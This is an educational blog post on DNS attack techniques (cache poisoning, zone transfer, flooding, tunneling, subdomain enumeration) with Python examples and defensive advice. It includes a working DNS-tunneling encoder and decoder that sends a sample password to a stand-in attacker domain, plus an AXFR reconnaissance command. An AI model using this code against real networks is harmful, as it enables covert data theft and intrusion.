- The DNS Verse – Getting Started
- The DNS Verse – Techniques of DNS Hacking
As promised in the last post, this post is about DNS-related techniques that attackers use and that we, as testers, use to assess the weaknesses and vulnerabilities of a DNS setup.
Let's focus, in a nutshell, on the techniques that target the weak points an attacker might use to sneak in.
Common Techniques for DNS
DNS Cache Poisoning
How It Works:
- Storing DNS Information:
- When a resolver looks up a name on your behalf, it saves the answer in its cache for as long as the record's TTL allows. The next time anyone using that resolver asks for the same name, the resolver answers from the cache instead of repeating the lengthy lookup through the DNS hierarchy.
- Malicious Exploitation:
- An attacker tricks the resolver into caching a forged answer. A resolver matches an incoming reply against its outstanding query only by a few values (the 16-bit transaction ID, the destination address and port, and on modern resolvers a randomized source port). An attacker who can guess or observe those values and reply before the real nameserver does gets a fake record accepted, and every client of that resolver is then sent to the attacker's address until the poisoned record expires.
Why It Works:
Faster Lookup: Caching exists to make lookups fast. The resolver trusts what is in its cache and does not re-ask the authoritative servers until the TTL runs out.
Exploitation Opportunity: Because one cached answer is reused for every client and every later request, a single accepted forgery misleads many users without triggering suspicion on their side. Resolvers that query from a fixed source port or use predictable transaction IDs make the guess cheap; source-port randomization makes it expensive, and DNSSEC validation lets a resolver reject a forged answer outright.
Imagine your friend takes your phone and, without you noticing, changes the number stored for one of your contacts to another valid phone number. When you call that contact name, the phone rings, but the wrong person picks up. That's DNS cache poisoning in a nutshell.
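To make the "guess the transaction ID" part concrete, here is an added simulation of a blind (off-path) poisoning race. It is illustration code written for this post, not real resolver code: the resolver is modelled as an outstanding (transaction ID, source port) pair, and the 1024-65535 ephemeral-port range and the attempt counts are assumptions.

```python
import random

# Added model of an off-path cache-poisoning race. It is a simulation for
# illustration, not real resolver code; the port range and counts are assumptions.
TXID_SPACE = 65536          # the DNS transaction ID is 16 bits
PORT_RANGE = (1024, 65536)  # assumed ephemeral-port range of a randomizing resolver
FIXED_PORT = 53             # a resolver that always queries from one predictable port


def forged_reply_accepted(pending, forged):
    """A resolver matches a reply against its outstanding query only by the
    (transaction ID, source port) pair; pending and forged are such pairs."""
    return pending == forged


def attack_window(attempts, randomize_port, rng):
    """One poisoning window: the resolver has just sent a query for a name that
    is not cached, and the attacker, who cannot see it, fires `attempts`
    forged answers with guessed IDs/ports before the real answer arrives.
    Returns True if any guess matched and the forgery would be cached."""
    txid = rng.randrange(TXID_SPACE)
    port = rng.randrange(*PORT_RANGE) if randomize_port else FIXED_PORT
    pending = (txid, port)
    for _ in range(attempts):
        guess = (rng.randrange(TXID_SPACE),
                 rng.randrange(*PORT_RANGE) if randomize_port else FIXED_PORT)
        if forged_reply_accepted(pending, guess):
            return True
    return False


def success_rate(attempts, randomize_port, windows=1000, seed=1):
    """Fraction of simulated windows the attacker wins (deterministic per seed)."""
    rng = random.Random(seed)
    wins = sum(attack_window(attempts, randomize_port, rng) for _ in range(windows))
    return wins / windows


def expected_rate(attempts, randomize_port):
    """Analytic probability that at least one of `attempts` blind guesses hits."""
    space = TXID_SPACE * ((PORT_RANGE[1] - PORT_RANGE[0]) if randomize_port else 1)
    return 1 - (1 - 1 / space) ** attempts


if __name__ == "__main__":
    for randomize in (False, True):
        print(f"port randomization={randomize}: "
              f"simulated={success_rate(1000, randomize):.4f} "
              f"expected={expected_rate(1000, randomize):.6f}")
```

With a fixed port, 1000 forged packets win roughly 1.5% of windows, and an attacker can open a fresh window at will by querying a random name that is not cached, so the odds accumulate quickly. With a randomized source port the same effort wins about one window in four million, which is why port randomization (and, properly, DNSSEC) is the fix rather than hoping the transaction ID is hard to guess.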
DNS Zone Transfer
Let's get into this.
A DNS zone transfer is a process used to copy DNS information from one nameserver to another. This helps keep backup nameservers updated with the most current information.
Example:
- Primary and Secondary Phone Books:
- Primary Phone Book (Primary Nameserver): This is your main, up-to-date phone book that has all the latest contact details.
- Secondary Phone Book (Secondary Nameserver): This is a backup phone book that you want to keep the same as the primary one.
- Zone Transfer:
- Imagine you want to make sure the secondary phone book always has the latest updates. To do this, you use a process called a zone transfer.
- A zone transfer is like taking the latest version of the primary phone book and copying it to the secondary phone book.
- How It Works:
- Primary Phone Book: This phone book is where all the updates and changes are made.
- Zone Transfer Process: Periodically, or whenever there is a change, the details from the primary phone book are copied over to the secondary phone book. This ensures that the secondary phone book has the same information as the primary one.
There are two mechanisms in the DNS system that are used to perform a zone transfer.
Full Zone Transfer (AXFR)
With AXFR (RFC 5936), the entire zone is transferred in one go. A secondary requests it when it first loads the zone or when it notices the primary's SOA serial is higher than its own. It can also be requested manually with a normal DNS client, which is exactly what an attacker does.
Incremental Zone Transfer (IXFR)
With IXFR (RFC 1995), only the changes since the last transfer are sent, identified by the SOA serial the secondary already holds. If the primary cannot serve the difference, it falls back to a full AXFR.
A DNS zone transfer can be compared to a detailed map of an organization's online setup. If attackers get hold of this map, they can see a lot of useful information about the organization's network.
Zone transfers are meant for secondaries only, but a nameserver that does not restrict who may request AXFR hands the whole zone to anyone who asks. In a single query the attacker gets a comprehensive map of the organization's network: every subdomain, mail servers, IP addresses and naming conventions. This information helps them plan further attacks, and trying an AXFR against each of a target's nameservers is a standard first step in DNS reconnaissance.
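The practical check is one command, `dig axfr example.com @ns1.example.com`, run against each nameserver of the zone. What follows is an added example (written for this post, not a tool from the original) that parses the text `dig` prints and pulls out the recon-relevant parts. The zone content is constructed and uses the documentation address ranges 192.0.2.0/24 and 198.51.100.0/24; a properly configured server instead prints "Transfer failed.", which is also shown.

```python
# Added example: parse the output of `dig axfr <zone> @<nameserver>` and
# summarise what an attacker learns. Both samples below are constructed.
SAMPLE_AXFR = """\
; <<>> DiG 9.18.1 <<>> axfr example.com @ns1.example.com
;; global options: +cmd
example.com.\t\t3600\tIN\tSOA\tns1.example.com. hostmaster.example.com. 2024010101 7200 3600 1209600 3600
example.com.\t\t3600\tIN\tNS\tns1.example.com.
example.com.\t\t3600\tIN\tNS\tns2.example.com.
example.com.\t\t3600\tIN\tMX\t10 mail.example.com.
ns1.example.com.\t3600\tIN\tA\t192.0.2.1
ns2.example.com.\t3600\tIN\tA\t192.0.2.2
mail.example.com.\t3600\tIN\tA\t192.0.2.10
vpn.example.com.\t3600\tIN\tA\t192.0.2.20
dev-jenkins.example.com.\t300\tIN\tA\t198.51.100.5
dev-jenkins.example.com.\t300\tIN\tTXT\t"internal build server"
example.com.\t\t3600\tIN\tSOA\tns1.example.com. hostmaster.example.com. 2024010101 7200 3600 1209600 3600
;; Query time: 12 msec
;; XFR size: 11 records (messages 1, bytes 300)
"""

# What a server that restricts transfers answers (constructed, same shape as dig's output).
SAMPLE_REFUSED = """\
; <<>> DiG 9.18.1 <<>> axfr example.com @ns1.example.com
;; global options: +cmd
; Transfer failed.
"""


def parse_axfr(text):
    """Return (name, ttl, type, rdata) for every resource record line in dig output."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue  # blank lines, comments and dig's own status lines
        fields = line.split(None, 4)  # name ttl class type rdata
        if len(fields) < 5 or fields[2] != "IN":
            continue
        name, ttl, _cls, rtype, rdata = fields
        records.append((name.rstrip(".").lower(), int(ttl), rtype, rdata))
    return records


def transfer_allowed(text):
    """True when the server actually handed over the zone: the transfer is
    bracketed by SOA records. A refusing server prints 'Transfer failed.'."""
    if "Transfer failed." in text:
        return False
    return any(r[2] == "SOA" for r in parse_axfr(text))


def summarize(records, zone):
    """The map an attacker wants: hostnames, addresses, mail and name servers."""
    zone = zone.rstrip(".").lower()
    return {
        "hosts": sorted({r[0] for r in records if r[0] != zone}),
        "addresses": sorted({r[3] for r in records if r[2] in ("A", "AAAA")}),
        "mail": sorted({r[3].split()[-1].rstrip(".") for r in records if r[2] == "MX"}),
        "nameservers": sorted({r[3].rstrip(".") for r in records if r[2] == "NS"}),
    }


if __name__ == "__main__":
    if transfer_allowed(SAMPLE_AXFR):
        print("zone transfer allowed; summary:", summarize(parse_axfr(SAMPLE_AXFR), "example.com"))
    print("restricted server allows transfer:", transfer_allowed(SAMPLE_REFUSED))
```

On the defending side the fix is to allow AXFR only from the secondaries, for example with BIND's `allow-transfer { <secondary address>; };` in the zone or options block, and to authenticate the transfer with a TSIG key so a spoofed secondary address is not enough.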
DNS Flooding
Imagine you have a library with a librarian who helps people find books. The librarian (DNS server) answers requests from people asking for specific book locations (domain names).
A DNS flooding attack is like a situation where someone starts sending an overwhelming number of fake book requests to the librarian all at once. The librarian is so busy trying to handle these fake requests that they can't help the real people who come to the library. As a result, the server can't respond to legitimate requests from real users, causing a denial of service for those trying to visit real websites.
Example:
Normal Scenario:
You want to visit a website, say example.com.
Your computer sends a request to a DNS server to find out the address of example.com.
The DNS server looks up the address and sends it back to your computer, allowing you to visit the site.
During a DNS Flooding Attack:
Attackers use many computers (often part of a botnet) to send an enormous number of DNS requests to the DNS server, usually with spoofed source addresses so that they are hard to filter.
These requests are constant and meaningless queries asking about random or non-existent names. Random labels under a real zone are especially effective: nothing is cached, so every query also has to be forwarded to the victim's authoritative nameservers, which end up answering NXDOMAIN for all of them.
The DNS server gets overwhelmed trying to handle all these requests, and the legitimate users behind it are left waiting.
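From the detection side, a random-subdomain flood has a recognisable shape: one source sending far more queries than a normal client, almost all for distinct names and almost all answered NXDOMAIN. The following is an added example written for this post (not from the original) that scores sources over a constructed query log; the log format, "epoch_seconds source_ip qname rcode" per line, is invented for the example and is not a real server's log format, and the thresholds are assumptions to tune per environment.

```python
from collections import defaultdict


def build_sample_log():
    """Constructed sample: one normal client plus one flood source, ten seconds."""
    lines = []
    for i, name in enumerate(["www.example.com", "mail.example.com",
                              "www.example.com", "api.example.com"]):
        lines.append(f"{1700000000 + 2 * i} 198.51.100.7 {name} NOERROR")
    # 600 queries for random, non-existent labels under the victim zone
    for i in range(600):
        lines.append(f"{1700000000 + i // 60} 203.0.113.9 q{i:04x}.example.com NXDOMAIN")
    return "\n".join(lines)


def parse_log(text):
    """Invented format: 'epoch_seconds source_ip qname rcode' per line."""
    entries = []
    for line in text.splitlines():
        ts, src, qname, rcode = line.split()
        entries.append((int(ts), src, qname.lower(), rcode))
    return entries


def per_source_stats(entries):
    """Per source: query rate over its active span, NXDOMAIN share, distinct names."""
    by_src = defaultdict(list)
    for ts, src, qname, rcode in entries:
        by_src[src].append((ts, qname, rcode))
    stats = {}
    for src, rows in by_src.items():
        first, last = min(t for t, _, _ in rows), max(t for t, _, _ in rows)
        span = max(1, last - first + 1)
        nx = sum(1 for _, _, r in rows if r == "NXDOMAIN")
        stats[src] = {
            "queries": len(rows),
            "qps": len(rows) / span,
            "nxdomain_ratio": nx / len(rows),
            "distinct_names": len({q for _, q, _ in rows}),
        }
    return stats


def flag_flood_sources(entries, max_qps=20.0, max_nx_ratio=0.5):
    """Sources that both exceed the rate and mostly get NXDOMAIN back: the
    signature of a random-subdomain flood. Thresholds are assumptions."""
    return sorted(src for src, s in per_source_stats(entries).items()
                  if s["qps"] > max_qps and s["nxdomain_ratio"] > max_nx_ratio)


if __name__ == "__main__":
    entries = parse_log(build_sample_log())
    for src, s in per_source_stats(entries).items():
        print(src, s)
    print("flood sources:", flag_flood_sources(entries))
```

Per-source counting works on a resolver, where the sources are your own clients, but on an internet-facing authoritative server the source addresses are usually spoofed, so it is a weak signal there; the rate limiting has to be on responses (BIND's `rate-limit` statement, for instance) and the capacity has to come from anycast and upstream filtering.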
DNS Tunneling
What It Is: DNS tunneling is a method used to secretly send data out of a network (or commands into it) by hiding it in DNS queries and responses.
How It Works:
- Normal DNS Use:
- You ask a DNS server for the address of a website (e.g., example.com).
- The server replies with the IP address, and you visit the site.
- In DNS Tunneling:
- Attacker's Setup: An attacker controls a domain (e.g., hiddenserver.com) and runs the authoritative nameserver for it. They also have a foothold on a compromised computer inside the network from which they want to steal data.
- Data Hiding: Malware on that computer encodes the stolen data into the labels of DNS queries that look like ordinary lookups (e.g., <encoded-data>.hiddenserver.com). A label is limited to 63 characters and a whole name to 253, so the data is split across many small queries.
- Sending Data: The queries go to the organization's own resolver, which cannot answer them from cache and therefore forwards each one to the authoritative server for hiddenserver.com, which is the attacker's.
- Receiving Data: The attacker's server extracts the hidden data from the query names and can send data back inside the responses (in TXT records, for example), all as DNS traffic that the firewall allows.
Why It Works:
DNS traffic is usually permitted by firewalls, and the resolver does the forwarding on the attacker's behalf, so the hidden data escapes even when the compromised host has no direct internet access. The giveaway is in the queries themselves: unusually long, high-entropy labels and a very large number of unique subdomains under a single domain.
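Here is an added example, written for this post and not taken from any tunneling tool, showing both ends of the channel described above plus the defender's heuristic: the client side chops a payload into base32 labels under hiddenserver.com (base32 because DNS names are case-insensitive, so base64 would be ambiguous), the server side reassembles them from the query names, and a detector flags names with long or high-entropy labels. The payload is constructed, and the length and entropy thresholds are assumptions to tune.

```python
import base64
import math
from collections import Counter

MAX_LABEL = 63   # RFC 1035 limit on one label
MAX_NAME = 253   # practical limit on a full name in text form
ATTACKER_ZONE = "hiddenserver.com"  # the attacker-controlled domain from the text

# Constructed payload for the demonstration.
SECRET = b"user=alice;password=hunter2;host=db01.internal.example.com\n"


def encode_for_dns(data, zone=ATTACKER_ZONE, chunk=30):
    """Client side: split the payload into chunks, base32-encode each one and
    build a query name per chunk as <seq>.<payload>.<zone>.
    30 bytes become 48 base32 characters, safely under the 63-character label limit."""
    names = []
    for seq, off in enumerate(range(0, len(data), chunk)):
        label = base64.b32encode(data[off:off + chunk]).decode().rstrip("=").lower()
        name = f"{seq}.{label}.{zone}"
        if len(label) > MAX_LABEL or len(name) > MAX_NAME:
            raise ValueError("chunk too large for a DNS name")
        names.append(name)
    return names


def decode_from_dns(names, zone=ATTACKER_ZONE):
    """Server side: the attacker's authoritative server sees every query name
    (resolvers forward them because they cannot answer from cache). Strip the
    zone, restore the base32 padding and reassemble chunks in sequence order."""
    chunks = {}
    for name in names:
        if not name.endswith("." + zone):
            continue
        seq, label = name[:-len(zone) - 1].split(".", 1)
        padded = label.upper() + "=" * (-len(label) % 8)
        chunks[int(seq)] = base64.b32decode(padded)
    return b"".join(chunks[k] for k in sorted(chunks))


def shannon_entropy(s):
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def looks_like_tunnel(qname, max_label=30, max_entropy=3.5):
    """Defender heuristic: human-chosen labels are short and repetitive; encoded
    payload labels are long and high-entropy. Thresholds are assumptions."""
    labels = qname.lower().split(".")[:-2]  # ignore the registered domain and TLD
    return any(len(l) > max_label or shannon_entropy(l) > max_entropy for l in labels)


if __name__ == "__main__":
    queries = encode_for_dns(SECRET)
    for q in queries:
        print(q, "-> suspicious" if looks_like_tunnel(q) else "")
    print("reassembled:", decode_from_dns(queries))
```

The per-name heuristic is only a first filter; real tunnels are caught more reliably by counting unique subdomains per registered domain over time and by the sheer query volume to one domain, because an attacker can shorten labels to dodge a length threshold but cannot move data without many queries.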
Domain Enumeration
Domain enumeration is the process of finding subdomains under a main domain, like discovering subdomain.example.com under example.com. This is useful for identifying hidden services and potential vulnerabilities. It works through several methods:
- DNS Zone Transfer: asking each nameserver for the full zone (AXFR), which gives everything at once if the server is misconfigured.
- DNS Queries: checking common subdomains (www, mail, vpn, dev and so on) directly.
- Brute Forcing: guessing subdomains from wordlists, and from permutations of the names already found.
- Public Records and Search Engines: certificate transparency logs (crt.sh) and internet-wide scan data (Censys), where an issued certificate or a scanned host reveals a name.
- Third-Party Databases: services that track subdomains and historical DNS data, such as SecurityTrails and Shodan.
It is effective because of DNS's hierarchical nature, server misconfigurations, publicly available records, predictable subdomain names, and the historical data kept in external databases. Domain enumeration helps uncover attack surfaces and hidden services, and provides a detailed view of the target's infrastructure. One caveat when brute forcing: a zone with a wildcard record answers every name, so resolve a random label first and discard any "hit" that returns the same address.
That's it for today! In the upcoming post, we will showcase tools that perform some of the techniques discussed today for DNS-related attacks. Till then, stay tuned!